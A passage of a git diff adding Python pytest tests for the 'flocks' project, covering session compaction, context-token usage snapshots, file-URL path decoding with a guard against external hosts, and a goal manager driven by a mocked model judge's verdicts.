+    ) -> None:  # History is just the /compact command: expect a skip without summarizing.
+        compaction_module.reset_iterative_summary_cache("ses_empty_delta")
+        progress_events: list[tuple[str, dict[str, Any]]] = []
+        summarize_spy = AsyncMock(return_value=_structured_summary("unexpected"))
+        archive_spy = AsyncMock(return_value="continue")
+
+        async def fake_progress(stage: str, data: dict[str, Any]) -> None:
+            progress_events.append((stage, data))
+
+        async def fake_apply_config(cls, **kwargs: Any) -> None:  # noqa: ARG001
+            return None
+
+        async def fake_list_with_parts(cls, session_id: str) -> list:  # noqa: ARG001
+            return msgs_with_parts
+        # History holds nothing except the /compact command itself (no prior summary).
+        msgs_with_parts = [
+            _mwp("compact-command", "user", "/compact"),
+        ]
+        # Imported locally; attributes of Provider and Message are monkeypatched below.
+        from flocks.provider.provider import Provider
+        from flocks.session.message import Message
+
+        monkeypatch.setattr(
+            Provider,
+            "get",
+            classmethod(lambda cls, provider_id: MagicMock()),
+        )
+        monkeypatch.setattr(
+            Provider,
+            "apply_config",
+            classmethod(fake_apply_config),
+        )
+        monkeypatch.setattr(
+            Message,
+            "list_with_parts",
+            classmethod(fake_list_with_parts),
+        )
+        monkeypatch.setattr(
+            compaction_module.summary,
+            "summarize_single_pass",
+            summarize_spy,
+        )
+        monkeypatch.setattr(
+            SessionCompaction,
+            "_archive_and_write_summary",
+            classmethod(lambda cls, **kwargs: archive_spy(**kwargs)),
+        )
+        # Run a manual (auto=False) compaction whose parent is the /compact command message.
+        result = await SessionCompaction.process(
+            session_id="ses_empty_delta",
+            parent_id="compact-command",
+            messages=[{"id": "compact-command"}],
+            model_id="test-model",
+            provider_id="test-provider",
+            auto=False,
+            progress_callback=fake_progress,
+        )
+        # Expect a skip: neither spy awaited, an empty "load" event, and a "skipped_no_summary_input" completion.
+        assert result == "skipped"
+        summarize_spy.assert_not_awaited()
+        archive_spy.assert_not_awaited()
+        assert ("load", {"message_count": 0, "total_chars": 0}) in progress_events
+        assert (
+            "complete",
+            {"result": "skipped_no_summary_input"},
+        ) in progress_events
+
+
 @pytest.mark.asyncio
 class TestSummarizeChunkedIterative:
     async def test_calls_provider_once_per_chunk_no_merge(self) -> None:
@@ -336,4 +610,3 @@ async def test_no_previous_summary_uses_default_prompt(self) -> None:
         body = call.kwargs["messages"][0].content
         assert "<<<PREVIOUS_SUMMARY>>>" not in body
         assert "## Decisions" in body
-
diff --git a/tests/session/test_context_usage.py b/tests/session/test_context_usage.py
new file mode 100644
index 000000000..47d0e7347
--- /dev/null
+++ b/tests/session/test_context_usage.py
@@ -0,0 +1,266 @@
+from types import SimpleNamespace
+
+import pytest
+
+from flocks.session import context_usage
+
+
+def _message(  # Build a SimpleNamespace stand-in for a stored message; defaults describe a finished assistant turn.
+    message_id: str,
+    *,
+    role: str = "assistant",
+    created: int = 100,
+    tokens=None,
+    provider_id: str = "openai",
+    model_id: str = "gpt-4.1",
+    finish: str | None = "stop",
+    summary=None,
+    compacted=None,
+):
+    return SimpleNamespace(
+        id=message_id,
+        role=role,
+        time=SimpleNamespace(created=created),  # exposed as message.time.created
+        tokens=tokens,
+        providerID=provider_id,  # attribute names switch to camelCase here
+        modelID=model_id,
+        finish=finish,
+        summary=summary,
+        compacted=compacted,
+    )
+
+
+@pytest.fixture
+def context_usage_mocks(monkeypatch):  # Patches context_usage collaborators; returns the dict that drives the fakes.
+    state = {  # tests mutate these entries before calling the code under test
+        "active": [],
+        "all": [],
+        "estimate": 0,
+        "system_prompt": 0,
+        "tool_definitions": 0,
+        "parts": {},
+        "list_calls": [],
+    }
+    # Message.list stand-in: logs include_archived, then returns a copy of "all" or "active".
+    async def fake_list(session_id: str, include_archived: bool = False):
+        state["list_calls"].append(include_archived)
+        return list(state["all"] if include_archived else state["active"])
+    # Message.parts stand-in: parts registered for the message id, or an empty list.
+    async def fake_parts(message_id: str, session_id: str | None = None):
+        return list(state["parts"].get(message_id, []))
+
+    async def fake_estimate(session_id: str, messages: list):
+        return state["estimate"]
+
+    async def fake_system_prompt_tokens(*args, **kwargs):
+        return state["system_prompt"]
+    # Returns a 2-tuple: the configured token count and an empty tuple.
+    async def fake_tool_definition_tokens(*args, **kwargs):
+        return state["tool_definitions"], ()
+    # Install the fakes; resolve_model_info is pinned to return (200, 50, None).
+    monkeypatch.setattr(context_usage.Message, "list", fake_list)
+    monkeypatch.setattr(context_usage.Message, "parts", fake_parts)
+    monkeypatch.setattr(
+        context_usage.SessionPrompt,
+        "estimate_full_context_tokens",
+        fake_estimate,
+    )
+    monkeypatch.setattr(
+        context_usage.Provider,
+        "resolve_model_info",
+        lambda provider_id, model_id: (200, 50, None),
+    )
+    monkeypatch.setattr(
+        context_usage,
+        "_estimate_system_prompt_tokens",
+        fake_system_prompt_tokens,
+    )
+    monkeypatch.setattr(
+        context_usage,
+        "_estimate_tool_definition_tokens",
+        fake_tool_definition_tokens,
+    )
+    return state
+
+
+@pytest.mark.asyncio
+async def test_context_usage_prefers_fresh_observed_tokens(context_usage_mocks):
+    msg = _message(  # the only message carries provider-reported token counts
+        "assistant-1",
+        tokens={
+            "input": 90,
+            "output": 20,
+            "reasoning": 5,
+            "cache": {"read": 10, "write": 0},
+        },
+    )
+    context_usage_mocks["active"] = [msg]
+    context_usage_mocks["all"] = [msg]
+    context_usage_mocks["estimate"] = 60
+    context_usage_mocks["system_prompt"] = 30
+    context_usage_mocks["tool_definitions"] = 20
+    context_usage_mocks["parts"] = {
+        "assistant-1": [
+            SimpleNamespace(type="text", text="c" * 160),
+            SimpleNamespace(type="reasoning", text="r" * 80),
+        ]
+    }
+    # Build the snapshot through the patched collaborators.
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+    # NOTE(review): 125 == 90 + 20 + 5 + 10 and 110 == 60 + 30 + 20 — confirm that is how they are derived.
+    assert snapshot.used_tokens == 125
+    assert snapshot.observed_tokens == 125
+    assert snapshot.estimated_tokens == 110
+    assert snapshot.source == "observed"
+    assert snapshot.percent == 63
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("systemPrompt", 30),
+        ("toolDefinitions", 20),
+        ("conversation", 55),
+        ("reasoning", 20),
+        ("agentDelegation", 0),
+    ]
+    assert sum(segment.tokens for segment in snapshot.segments) == snapshot.used_tokens  # segments add up to the total
+
+
+@pytest.mark.asyncio
+async def test_context_usage_falls_back_to_estimate_without_provider_tokens(context_usage_mocks):
+    msg = _message("assistant-1", tokens=None)  # no provider-reported tokens on the message
+    context_usage_mocks["active"] = [msg]
+    context_usage_mocks["all"] = [msg]
+    context_usage_mocks["estimate"] = 80
+    # system_prompt and tool_definitions keep the fixture default of 0.
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+    # The estimate is expected to be reported as-is and labelled "estimated".
+    assert snapshot.used_tokens == 80
+    assert snapshot.observed_tokens is None
+    assert snapshot.source == "estimated"
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("conversation", 80),
+        ("agentDelegation", 0),
+    ]
+
+
+@pytest.mark.asyncio
+async def test_context_usage_ignores_observed_tokens_after_later_summary(context_usage_mocks):
+    observed = _message(  # earlier message (created=100) that does carry token counts
+        "assistant-1",
+        created=100,
+        tokens={"input": 190, "output": 20, "cache": {"read": 0, "write": 0}},
+    )
+    summary = _message(  # later message (created=200) marked as a summary, without token counts
+        "summary-1",
+        created=200,
+        tokens=None,
+        finish="summary",
+        summary={"tokens": 40},
+    )
+    context_usage_mocks["active"] = [observed, summary]
+    context_usage_mocks["all"] = [observed, summary]
+    context_usage_mocks["estimate"] = 40
+    # Build the snapshot through the patched collaborators.
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+    # The earlier observed counts must not be reported; the estimate of 40 is used instead.
+    assert snapshot.used_tokens == 40
+    assert snapshot.observed_tokens is None
+    assert snapshot.source == "estimated"
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("conversation", 40),
+        ("agentDelegation", 0),
+    ]
+
+
+@pytest.mark.asyncio
+async def test_context_usage_does_not_scan_archived_history(context_usage_mocks):
+    active = _message("assistant-1", tokens=None)
+    archived = _message("archived-1", tokens=None, compacted={"summary": "old"})
+    context_usage_mocks["active"] = [active]
+    context_usage_mocks["all"] = [active, archived]  # only returned when include_archived is true
+    context_usage_mocks["estimate"] = 40
+    # Build the snapshot through the patched collaborators.
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+    # Message.list must have been called exactly once, with include_archived=False.
+    assert context_usage_mocks["list_calls"] == [False]
+    assert snapshot.compacted_tokens == 0
+    assert snapshot.excluded_segments == []
+
+
+@pytest.mark.asyncio
+async def test_context_usage_splits_tool_parts_from_conversation(context_usage_mocks):
+    msg = _message("assistant-1", tokens=None)
+    context_usage_mocks["active"] = [msg]
+    context_usage_mocks["all"] = [msg]
+    context_usage_mocks["estimate"] = 30
+    context_usage_mocks["parts"] = {
+        "assistant-1": [
+            SimpleNamespace(  # the message's only part is a tool call with 120 characters of output
+                type="tool",
+                state=SimpleNamespace(
+                    input={},
+                    output="b" * 120,
+                    time={"start": 1, "end": 2},
+                ),
+            )
+        ]
+    }
+    # Build the snapshot through the patched collaborators.
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+    # All 30 tokens are expected under "tools"; no "conversation" segment is listed.
+    assert snapshot.used_tokens == 30
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("tools", 30),
+        ("agentDelegation", 0),
+    ]
+    assert sum(segment.tokens for segment in snapshot.segments) == 30
+
+
+@pytest.mark.asyncio
+async def test_context_usage_splits_skill_and_delegation_tools(context_usage_mocks):
+    msg = _message("assistant-1", tokens=None)
+    context_usage_mocks["active"] = [msg]
+    context_usage_mocks["all"] = [msg]
+    context_usage_mocks["estimate"] = 110
+    context_usage_mocks["parts"] = {  # five tool parts plus one subtask part on the same message
+        "assistant-1": [
+            SimpleNamespace(
+                type="tool",
+                tool="read",
+                state=SimpleNamespace(input={}, output="r" * 120, time={"start": 1}),
+            ),
+            SimpleNamespace(
+                type="tool",
+                tool="skill_load",
+                state=SimpleNamespace(input={}, output="s" * 80, time={"start": 2}),
+            ),
+            SimpleNamespace(
+                type="tool",
+                tool="task",
+                state=SimpleNamespace(input={}, output="t" * 80, time={"start": 3}),
+            ),
+            SimpleNamespace(
+                type="tool",
+                tool="delegate_task",
+                state=SimpleNamespace(input={}, output="d" * 40, time={"start": 4}),
+            ),
+            SimpleNamespace(  # no ``tool`` attribute here; the name appears only in metadata
+                type="tool",
+                metadata={"tool": "skill_load"},
+                state=SimpleNamespace(input={}, output="m" * 40, time={"start": 5}),
+            ),
+            SimpleNamespace(
+                type="subtask",
+                prompt="p" * 40,
+                description="q" * 40,
+            ),
+        ]
+    }
+    # Build the snapshot through the patched collaborators.
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+    # NOTE(review): the expected figures are consistent with ~4 characters per token — confirm against the estimator.
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("tools", 30),
+        ("skillLoad", 30),
+        ("agentDelegation", 50),
+    ]
+    tools_segment = next(segment for segment in snapshot.segments if segment.key == "tools")
+    assert tools_segment.tokens == 30  # repeats the "tools" figure already pinned by the list above
diff --git a/tests/session/test_file_extractor.py b/tests/session/test_file_extractor.py
index 062b6d81e..e34a21c4c 100644
--- a/tests/session/test_file_extractor.py
+++ b/tests/session/test_file_extractor.py
@@ -11,11 +11,14 @@
 import base64
 import tempfile
 from pathlib import Path
+from urllib.parse import quote
 
 import pytest
 
 from flocks.session.utils.file_extractor import (
     extract_file_text,
+    file_download_url_to_path,
+    file_url_to_path,
     is_text_extractable_mime,
     read_file_part_bytes,
     truncate_extracted_text,
@@ -26,6 +29,7 @@
 # read_file_part_bytes
 # ---------------------------------------------------------------------------
 
+
 class TestReadFilePartBytes:
     def test_empty_string_returns_none(self):
         assert read_file_part_bytes("") is None
@@ -69,46 +73,117 @@ def test_file_url_with_spaces_in_path(self, tmp_path):
         result = read_file_part_bytes(url)
         assert result == b"spaced content"
 
+    def test_windows_drive_file_url_path_does_not_keep_posix_prefix(self):  # no leading "/" before the drive letter
+        path = file_url_to_path("file:///C:/Users/demo/Pictures/channel%20image.png")
+        assert path == "C:/Users/demo/Pictures/channel image.png"  # %20 is decoded to a space
+
+    def test_macos_file_url_path_is_decoded(self):  # /Users/... path keeps its leading slash
+        path = file_url_to_path("file:///Users/demo/Pictures/channel%20image.png")
+        assert path == "/Users/demo/Pictures/channel image.png"  # %20 is decoded to a space
+
+    def test_linux_file_url_path_is_decoded(self):  # /home/... path keeps its leading slash
+        path = file_url_to_path("file:///home/demo/Pictures/channel%20image.png")
+        assert path == "/home/demo/Pictures/channel image.png"  # %20 is decoded to a space
+
+    def test_unc_file_url_path_preserves_host(self):  # file://server/... keeps the host as //server
+        path = file_url_to_path("file://server/share/channel%20image.png")
+        assert path == "//server/share/channel image.png"  # %20 is decoded to a space
+
+    def test_download_url_path_is_extracted(self):  # Windows drive path carried in the ``path`` query parameter
+        path = file_download_url_to_path(
+            "/api/file/download?path=C%3A%2FUsers%2Fdemo%2FPictures%2Fchannel%20image.png"
+        )
+        assert path == "C:/Users/demo/Pictures/channel image.png"  # fully percent-decoded
+
+    def test_macos_download_url_path_is_extracted(self):  # /Users/... path carried in the ``path`` query parameter
+        path = file_download_url_to_path(
+            "/api/file/download?path=%2FUsers%2Fdemo%2FPictures%2Fchannel%20image.png"
+        )
+        assert path == "/Users/demo/Pictures/channel image.png"  # fully percent-decoded
+
+    def test_linux_download_url_path_is_extracted(self):  # /home/... path carried in the ``path`` query parameter
+        path = file_download_url_to_path(
+            "/api/file/download?path=%2Fhome%2Fdemo%2FPictures%2Fchannel%20image.png"
+        )
+        assert path == "/home/demo/Pictures/channel image.png"  # fully percent-decoded
+
+    def test_unc_download_url_path_is_extracted(self):  # //server/share path carried in the ``path`` query parameter
+        path = file_download_url_to_path(
+            "/api/file/download?path=%2F%2Fserver%2Fshare%2Fchannel%20image.png"
+        )
+        assert path == "//server/share/channel image.png"  # both leading slashes survive decoding
+
+    def test_download_url_reads_file(self, tmp_path):  # relative download URL resolves to a real file on disk
+        test_file = tmp_path / "channel image.png"
+        test_file.write_bytes(b"image bytes")
+        url = f"/api/file/download?path={quote(test_file.as_posix(), safe='')}"  # safe='' also encodes "/"
+        result = read_file_part_bytes(url)
+        assert result == b"image bytes"
+
+    def test_absolute_download_url_reads_file(self, tmp_path):  # same as the relative case, with a localhost origin
+        test_file = tmp_path / "channel image.png"
+        test_file.write_bytes(b"image bytes")
+        url = f"http://localhost:5173/api/file/download?path={quote(test_file.as_posix(), safe='')}"
+        result = read_file_part_bytes(url)
+        assert result == b"image bytes"  # the localhost download URL is read as a local file
+
+    def test_external_download_url_is_not_treated_as_local_file(self, tmp_path):  # guards against reading local files via foreign hosts
+        test_file = tmp_path / "secret.txt"
+        test_file.write_bytes(b"secret")  # the file exists, so a None result is not due to a missing file
+        url = f"https://example.com/api/file/download?path={quote(test_file.as_posix(), safe='')}"
+        assert file_download_url_to_path(url) is None
+        assert read_file_part_bytes(url) is None
+
 
 # ---------------------------------------------------------------------------
 # is_text_extractable_mime
 # ---------------------------------------------------------------------------
 
+
 class TestIsTextExtractableMime:
-    @pytest.mark.parametrize("mime", [
-        "text/plain",
-        "text/html",
-        "text/css",
-        "text/javascript",
-        "text/markdown",
-        "text/csv",
-        "text/xml",
-    ])
+    @pytest.mark.parametrize(
+        "mime",
+        [
+            "text/plain",
+            "text/html",
+            "text/css",
+            "text/javascript",
+            "text/markdown",
+            "text/csv",
+            "text/xml",
+        ],
+    )
     def test_text_prefix_is_extractable(self, mime):
         assert is_text_extractable_mime(mime) is True
 
-    @pytest.mark.parametrize("mime", [
-        "application/json",
-        "application/ld+json",
-        "application/xml",
-        "application/yaml",
-        "application/x-yaml",
-        "application/javascript",
-        "application/x-sh",
-        "application/x-shellscript",
-    ])
+    @pytest.mark.parametrize(
+        "mime",
+        [
+            "application/json",
+            "application/ld+json",
+            "application/xml",
+            "application/yaml",
+            "application/x-yaml",
+            "application/javascript",
+            "application/x-sh",
+            "application/x-shellscript",
+        ],
+    )
     def test_special_application_mimes_are_extractable(self, mime):
         assert is_text_extractable_mime(mime) is True
 
-    @pytest.mark.parametrize("mime", [
-        "image/png",
-        "image/jpeg",
-        "video/mp4",
-        "audio/mpeg",
-        "application/octet-stream",
-        "application/zip",
-        "application/pdf",  # PDF handled separately
-    ])
+    @pytest.mark.parametrize(
+        "mime",
+        [
+            "image/png",
+            "image/jpeg",
+            "video/mp4",
+            "audio/mpeg",
+            "application/octet-stream",
+            "application/zip",
+            "application/pdf",  # PDF handled separately
+        ],
+    )
     def test_binary_mimes_are_not_extractable(self, mime):
         assert is_text_extractable_mime(mime) is False
 
@@ -120,6 +195,7 @@ def test_empty_string_is_not_extractable(self):
 # truncate_extracted_text
 # ---------------------------------------------------------------------------
 
+
 class TestTruncateExtractedText:
     def test_short_text_not_truncated(self):
         text = "hello world"
@@ -167,6 +243,7 @@ def test_default_max_chars(self):
 # extract_file_text
 # ---------------------------------------------------------------------------
 
+
 class TestExtractFileText:
     def test_plain_text_file(self, tmp_path):
         f = tmp_path / "readme.txt"
diff --git a/tests/session/test_goal.py b/tests/session/test_goal.py
new file mode 100644
index 000000000..7e845d7f3
--- /dev/null
+++ b/tests/session/test_goal.py
@@ -0,0 +1,383 @@
+from __future__ import annotations
+
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.command.direct import run_direct_command
+from flocks.session.goal import JUDGE_MAX_TOKENS, GoalManager
+
+
+@pytest.mark.asyncio
+async def test_goal_command_sets_state_and_prompt():  # /goal with an objective yields a prompt and stores an active goal
+    result = await run_direct_command(
+        "goal",
+        args="fix failing tests",
+        session_id="goal_command_session",
+    )
+    # The command is handled and produces a prompt (not text) that embeds the objective.
+    assert result.handled is True
+    assert result.text is None
+    assert result.prompt is not None
+    assert "Active goal: fix failing tests" in result.prompt
+    assert "specific blocker" in result.prompt
+    # The goal state is then read back through GoalManager for the same session id.
+    state = await GoalManager.get("goal_command_session")
+
+    assert state is not None
+    assert state.status == "active"
+    assert state.objective == "fix failing tests"
+
+
+@pytest.mark.asyncio
+async def test_goal_command_rejects_empty_objective():  # /goal with empty args returns a usage message
+    result = await run_direct_command(
+        "goal",
+        args="",
+        session_id="goal_empty_session",
+    )
+    # Handled but unsuccessful: usage text is returned and no prompt is produced.
+    assert result.handled is True
+    assert result.success is False
+    assert result.text == "Usage: /goal <objective>"
+    assert result.prompt is None
+
+
+@pytest.mark.asyncio
+async def test_goal_records_only_first_initial_clarification():  # a second clarification must not replace the first
+    session_id = "goal_initial_clarification_session"
+    await GoalManager.set_goal(session_id, "make it work")
+    # Record two clarifications in a row, each with its own message and call id.
+    first_state = await GoalManager.record_initial_clarification(
+        session_id,
+        [{"question": "What should work?"}],
+        [["The MCP test connection button"]],
+        message_id="msg_question_1",
+        call_id="call_question_1",
+    )
+    second_state = await GoalManager.record_initial_clarification(
+        session_id,
+        [{"question": "Should I run tests?"}],
+        [["Yes"]],
+        message_id="msg_question_2",
+        call_id="call_question_2",
+    )
+    # Both calls return a state, but the stored clarification still belongs to the first call.
+    assert first_state is not None
+    assert second_state is not None
+    state = await GoalManager.get(session_id)
+    assert state is not None
+    assert state.initial_clarification is not None
+    assert state.initial_clarification.message_id == "msg_question_1"
+    assert state.initial_clarification.call_id == "call_question_1"
+    assert state.initial_clarification.answers[0].question == "What should work?"
+    assert state.initial_clarification.answers[0].answer == "The MCP test connection button"
+    assert "Should I run tests?" not in state.initial_clarification.text
+
+
+@pytest.mark.asyncio
+async def test_goal_clear_removes_persisted_state():  # clear() reports True and a later get() returns None
+    session_id = "goal_clear_session"
+    await GoalManager.set_goal(session_id, "make it work")
+    # Clear the goal, then read the state back for the same session.
+    deleted = await GoalManager.clear(session_id)
+    state = await GoalManager.get(session_id)
+    # The goal set above must be gone.
+    assert deleted is True
+    assert state is None
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_completes_when_judge_finds_done():  # "complete" verdict stops the loop and completes the goal
+    session_id = "goal_complete_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(  # stub provider whose chat() returns a JSON "complete" verdict
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "complete", "reason": "The final response says the implementation and tests are complete."}'
+        ))
+    )
+    # Provider.get is patched inside flocks.session.goal so the evaluation receives the stub.
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Implemented the feature, updated the tests, and the focused test suite passed.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+    state = await GoalManager.get(session_id)
+    # The verdict is surfaced on the decision and the stored status becomes "completed".
+    assert decision.verdict == "complete"
+    assert decision.should_continue is False
+    assert state is not None
+    assert state.status == "completed"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_blocks_when_judge_finds_goal_unachievable():  # "blocked" verdict stops the loop and blocks the goal
+    session_id = "goal_blocked_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(  # stub provider whose chat() returns a JSON "blocked" verdict
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "blocked", "reason": "The repository is unavailable, so the goal is blocked."}'
+        ))
+    )
+    # Provider.get is patched inside flocks.session.goal so the evaluation receives the stub.
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "I cannot proceed because the repository is unavailable.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+    state = await GoalManager.get(session_id)
+    # The verdict is surfaced on the decision and the stored status becomes "blocked".
+    assert decision.verdict == "blocked"
+    assert decision.should_continue is False
+    assert state is not None
+    assert state.status == "blocked"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_waits_when_agent_asks_for_clarification():  # "waiting" verdict stops the loop but keeps the goal active
+    session_id = "goal_waiting_session"
+    await GoalManager.set_goal(session_id, "write tests 10 times")
+    provider = SimpleNamespace(  # stub provider whose chat() returns a JSON "waiting" verdict
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "waiting", "reason": "The assistant is asking the user for clarification."}'
+        ))
+    )
+    # Provider.get is patched inside flocks.session.goal so the evaluation receives the stub.
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Please clarify what tests to write and where to place them.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+    state = await GoalManager.get(session_id)
+    # The reason is carried over verbatim; status stays "active" with last_verdict "waiting".
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
+    assert decision.reason == "The assistant is asking the user for clarification."
+    assert state is not None
+    assert state.status == "active"
+    assert state.last_verdict == "waiting"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_waits_when_runtime_has_pending_user_input():  # pending_user_input=True yields a "waiting" decision
+    session_id = "goal_pending_user_input_session"
+    await GoalManager.set_goal(session_id, "triage phishing email")
+    # No provider is patched and no provider_id/model_id is passed in this call.
+    decision = await GoalManager.evaluate_after_turn(
+        session_id,
+        "I made progress and can continue.",
+        pending_user_input=True,
+    )
+    state = await GoalManager.get(session_id)
+    # The decision carries a fixed reason string; the goal stays "active".
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
+    assert decision.reason == "session has a pending user question"
+    assert state is not None
+    assert state.status == "active"
+    assert state.last_verdict == "waiting"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_continues_until_budget_then_pauses():  # With max_turns=1, a "continue" verdict must not continue and the goal ends up paused.
+    session_id = "goal_budget_session"
+    state = await GoalManager.set_goal(session_id, "keep going", max_turns=1)  # NOTE(review): this binding is overwritten by GoalManager.get() below before it is read.
+    provider = SimpleNamespace(  # Stub provider: async chat() returns a canned "continue" judge reply.
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "continue", "reason": "The work is not complete yet."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "I made progress.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+    state = await GoalManager.get(session_id)
+
+    assert decision.verdict == "continue"
+    assert decision.should_continue is False  # The verdict stays "continue" but continuation is denied.
+    assert state is not None
+    assert state.status == "paused"
+    assert state.paused_reason == "turn budget exhausted (1/1)"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_uses_model_judge_when_provider_model_are_available():  # With provider/model ids given, chat() is awaited once and its verdict and reason are returned.
+    session_id = "goal_model_judge_complete_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(  # Stub provider: async chat() returns a canned "complete" judge reply.
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "complete", "reason": "The final response says the implementation and tests are complete."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Implemented the feature and tests passed.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()  # Exactly one call to the stubbed chat().
+    assert decision.verdict == "complete"
+    assert decision.reason == "The final response says the implementation and tests are complete."
+
+
+@pytest.mark.asyncio
+async def test_goal_model_judge_receives_initial_clarification():  # The recorded initial clarification must appear in the prompt passed to chat().
+    session_id = "goal_model_judge_clarification_session"
+    await GoalManager.set_goal(session_id, "make it work")
+    await GoalManager.record_initial_clarification(  # Called with a list of question dicts and a list of answer lists.
+        session_id,
+        [{"question": "What should work?"}],
+        [["The MCP test connection button should submit even with a blank saved name."]],
+    )
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "continue", "reason": "The response says more work remains."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "I made progress.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()
+    judge_prompt = provider.chat.await_args.kwargs["messages"][1].content  # The message at index 1 holds the prompt text under test.
+    assert "Original goal:\nmake it work" in judge_prompt
+    assert "Initial user clarification:" in judge_prompt
+    assert "The MCP test connection button should submit" in judge_prompt  # Answer text is included in the prompt.
+    assert decision.verdict == "continue"
+
+
+@pytest.mark.asyncio
+async def test_goal_model_judge_uses_provider_options_without_main_token_budget():  # chat() gets the provider's extra_body, JUDGE_MAX_TOKENS as max_tokens, and temperature 0.
+    session_id = "goal_model_judge_provider_options_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "complete", "reason": "The final response says the goal is complete."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider), patch(
+        "flocks.session.goal.build_provider_options",
+        return_value={"extra_body": {"reasoning_split": True}, "max_tokens": 128000},  # NOTE(review): presumably differs from JUDGE_MAX_TOKENS, which is what chat() is asserted to receive; confirm.
+    ) as build_options:
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Goal is complete.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    build_options.assert_called_once_with("test-provider", "test-model")  # Options are built from the provider and model ids only.
+    provider.chat.assert_awaited_once()
+    kwargs = provider.chat.await_args.kwargs  # Keyword arguments of the single chat() call.
+    assert kwargs["extra_body"] == {"reasoning_split": True}
+    assert kwargs["max_tokens"] == JUDGE_MAX_TOKENS
+    assert kwargs["temperature"] == 0
+    assert decision.verdict == "complete"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_continues_when_model_judge_says_not_done():  # With no max_turns passed to set_goal, a "continue" verdict sets should_continue to True.
+    session_id = "goal_model_judge_continue_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(  # Stub provider: async chat() returns a canned "continue" judge reply.
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "continue", "reason": "The response says more work remains."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "I made progress.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()
+    assert decision.verdict == "continue"
+    assert decision.should_continue is True
+    assert decision.reason == "The response says more work remains."  # Reason is taken from the stubbed reply.
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_waits_when_model_judge_returns_legacy_done_schema():  # A reply with a "done" key and no "verdict" key is reported as a judge failure with verdict "waiting".
+    session_id = "goal_legacy_done_schema_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(  # Stub reply uses {"done": ..., "reason": ...} and has no "verdict" field.
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"done": false, "reason": "The assistant is asking the user for clarification."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Please clarify which tests to run.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
+    assert decision.reason == "goal judge failed; waiting instead of continuing autonomously"  # The reply's own reason text is not used.
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_waits_when_model_judge_fails():  # When chat() raises, the decision is "waiting" with should_continue False.
+    session_id = "goal_model_judge_failure_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
